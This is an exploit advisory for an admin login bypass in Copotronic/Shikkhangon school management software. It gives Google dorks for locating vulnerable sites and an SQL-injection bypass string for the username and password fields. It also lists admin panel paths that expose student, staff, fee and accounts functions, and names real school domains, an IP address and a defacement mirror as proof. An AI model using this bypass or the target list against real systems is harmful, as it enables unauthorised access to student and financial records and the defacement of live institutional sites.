################################################################################################# # Exploit Title : Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/07/2018 # Vendor Homepages : copotronic.com ~ shikkhangon.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] ################################################################################################# # Another Exploit Title : Software IT Development By Copotronic InfoSystems Limited Shikkhangon CiMS Web Design Md. Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Description of the Software : Design & Develop By Copotyronic InfoSystem Ltd Copotronic InfoSystems Ltd. is a Private-Govt. joint venture software company. With a mission to build digital Bangladesh People’s Republic of Bangladesh has taken initiative to promote in IT companies to enable extensive automation services and supports to Govt. organizations of Bangladesh to be Digital.COPOTRONIC is a dynamic organization engaged in promoting software products, services,consultancy, Training using latest technologies to wide spectrum of corporations for over one decade. The quality & technology of the products reflect COPOTRONIC’s ability to produce & deliver world-class software solutions ################################################################################################# # Google Dorks : intext:''Copyright © 2018 Shikkhangon.com. All Right Reserved.'' intext:''© Copotronic InfoSystems Limited. All Right Reserved.'' inurl:''/about_college/'' site:edu.bd Copotronic # Admin Control Panel Path => /admin /login # Exploit : Username : '=''or' Password : '=''or' # Useable Administration Control Panel URL Links => /web/principal_message /web/notice /web/notice_list /web/form_add /web/form_list /web/information_list /web/slide /web/about /web/picture_gallery /web/catagory_list /admin/teacher_registration /admin/teacher_list /academic/class_teacher_assign /admin/teacher_salary_structure /admin/staff_registration /admin/staff_list /admin/student_registration /admin/student_list /admin/class_wise_student_list /admin/section_wise_student_list /admin/student_subject_assign /admin/student_subject_view /fees/fees_cat /fees/class_wise_fees_management /fees/student_fees_generate /web/slide# /academic/set_ca_marks /academic/create_tabulation_sheet /academic/marit_list /academic/marit_list_class /academic/mark_sheet /academic/transcript /academic/tabulation_sheet /academic/tabulation_sheet_subject_wise /academic/result_view /accounts/master_head_create /accounts/master_head_list /accounts/sub1_head_create /accounts/sub1_head_list /accounts/sub2_head_create /accounts/sub2_head_list /accounts/sub3_head_create /accounts/sub3_head_list /accounts/navigation_head_view /accounts/debit_voucher_entry /accounts/debit_voucher_list /accounts/credit_voucher_entry /accounts/credit_voucher_list /web/book_category_list /web/book_list /admin/student_sms_notice /admin/attendance /academic/show_class_routine /academic/show_exam_routine /admin/institute_information /admin/class_list /web/class_assign /academic/set_class_timing /academic/class_routine /admin/section_list /admin/section_assign /admin/session_list /admin/shift_list /admin/subject_list /admin/subject_assign /academic/gpa_system /academic/mark_distribution_system /academic/term_subject_list /academic/subject_wise_total_marks_list /academic/set_exam_time /academic/set_admit_card_initial /academic/term_list /admin/chartof_accounts /admin/weekly_holiday /admin/shift_assign Uploaded Image Path from Admin Panel => /template/upload/principal_image/1_principal_image[RANDOMNUMBER].png .jpg .jpeg .gif ################################################################################################# # Example Sites and Target Vulnerable IP Address 144.217.239.135 => gachuaadarshahs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => zone-h.org/mirror/id/31443090 ~ archive.is/xfYrE dbmrhs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => archive.is/JhaLN Vendor Homepage Admin Panel Path => copotronic.com/ims/shikkhangon/shikkhangon_admin/ ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################